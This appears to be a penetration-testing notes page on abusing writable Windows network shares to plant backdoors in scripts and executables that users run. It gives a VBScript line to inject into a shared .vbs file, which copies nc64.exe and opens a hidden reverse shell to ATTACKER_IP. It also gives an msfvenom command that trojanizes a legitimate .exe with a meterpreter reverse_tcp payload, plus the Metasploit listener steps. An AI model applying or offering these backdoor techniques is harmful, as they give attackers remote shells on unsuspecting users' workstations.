Abusing writable shares

Resources

1. CreateObject function

CreateObject function (Visual Basic for Applications)MicrosoftLearn

1. Run method

VBScript - Run Method (Windows Script Host)

.Run - VBScript - SS64.comss64.com

1. copy

copyMicrosoftLearn

1. msfvenom

Msfvenom | Penetration testing & ethical hacking conceptsjarrettgxz-sec.gitbook.io

Backdoor mechanism

It is quite common to find network shares that hosts executable or scripts created by the administrator, that users can use to perform daily tasks. This is useful for users since they can execute the shared resource without copying or installing it.

Whenever a user opens the shortcut on their workstation, the executable or script will be copied from the server to the local %temp% folder, where it will be executed. Thus, any payload will run in the context of the final user's workstation and logged-in user account.

If the share is writable by anyone (or at least our compromised account), we can abuse this to create a backdoor.

(1) Backdoor via .vbs scripts

Given that we have found a VBS (.vbs ) script running hosted on the share, we can inject a malicious code into script to provide ourselves with a backdoor.

Step 1

First, we have to upload a binary (such as nc64.exe ) that will aid us in creating the backdoor. This can be achieved using smbclient.

Step 2

Next, we can inject the malicious in the existing script. Assuming that the writable share is at \\TARGET_IP\writable_share .

CreateObject("WScript.Shell").Run "cmd.exe /c copy /y \\TARGET_IP\writable_share\nc64.exe %temp% & %temp%\nc64.exe -e cnd.exe ATTACKER_IP PORT", 0, True

Essentially, this command executes a command using cmd.exe which calls the copy command to copy the uploaded nc64.exe binary (uploaded to share) to the %temp% directory, before executing a reverse shell that provides us a backdoor to the system.

• the /y flag provided to copy means

Suppresses prompting to confirm that you want to overwrite an existing destination file.

According to this page, the following describes the last 2 values provided to the Run method:

• intWindowStyle

Optional. Integer value indicating the appearance of the program's window. Note that not all programs make use of this information.

value of 0 : "Hides the window and activates another window."

• bWaitOnReturn

Optional. Boolean value indicating whether the script should wait for the program to finish executing before continuing to the next statement in your script.

If set to True , script execution halts until the program finishes.

Step 3

Finally, we have to start a listener using the exploit/multi/handler from Metasploit. Now, we will gain a remote shell on a user's desktop whenever someone executes this script.

(2) Backdoor via .exe files

Given that we have found a Windows binary such as an .exe file, we can download it from the share and use msfvenom to inject a backdoor functionality. The result is a binary that still fulfils its original purpose, but execute an additional payload silently.

Step 1

We can use the downloaded binary as a template to create a new malicious binary (suppose the binary is named vuln.exe):

$ msfvenom --platform windows -x vuln.exe -k -p windows/meterpreter/reverse_tcp LHOST=ATTACKER_IP LPORT=PORT -b "\x00" -f exe -o mal_vuln.exe

Step 2

Finally, we have to start a listener using the exploit/multi/handler from Metasploit. Now, whenever someone executes this script, we will gain a remote shell on that user's desktop. Now, we will gain a remote shell on a user's desktop whenever someone executes the binary.